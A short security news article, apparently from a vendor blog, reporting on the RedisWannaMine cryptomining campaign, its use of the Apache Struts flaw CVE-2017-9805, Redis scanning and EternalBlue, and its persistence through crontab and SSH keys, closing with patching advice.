Security researcher Nadav Avital uncovered a cryptocurrency-mining operation they named RedisWannaMine, which targets database and application servers by exploiting the notorious EternalBlue.
RedWannaMine exploits CVE-2017-9805, a remote code execution (RCE) vulnerability in Apache Struts. It’s an open-source framework used for developing Java web applications and is reportedly used by at least 65% of Fortune 100 companies. Operators of RedisWannaMine exploit this security flaw to run a shell command to download cryptocurrency-mining malware.
When the researchers followed operation’s trail, they also found a shell script file responsible for:
Downloading cryptocurrency-mining malware
Gaining persistence through new entries in crontab, a Linux-based time-based job/task scheduler
Getting remote access to the affected system through a new Secure Shell (SSH) key entry
RedWannaMine’s attack chain also involves scanning vulnerable Redis servers (an open-source framework mainly used for databases) via port 6379 and infecting them with cryptocurrency-mining malware. It also uses a transmission control protocol (TCP) scanner to search for open port 445, the default port of Server Message Block (SMB). It then exploits EternalBlue to drop the miner and further spread.
Indeed, these types of malware are becoming as widespread as the cryptocurrencies themselves. In fact, cryptocurrency mining was the most detected network event in devices connected to home routers, peaking at over 23 million in the third quarter of 2017.
Trend Micro’s proactive solutions against fileless cryptocurrency-mining malware (click to enlarge)
Given that RedWannaMine targets servers, it could significantly affect organizations that use them. Apart from increasing power consumption, it can also risk disruption in operations as the malware steals resources needed to mine for cryptocurrencies.
More importantly, RedisWannaMine also highlights the real-life significance of patching and importance of adopting best practices for system administrators responsible for watching over their company’s online perimeter. This is particularly true for organizations that build, use, and deploy their own web applications, as they need to integrate security at each level of their application’s lifecycle. Just like other threats that weaponized potent exploits, one vulnerable device is all it takes to affect all systems connected to it.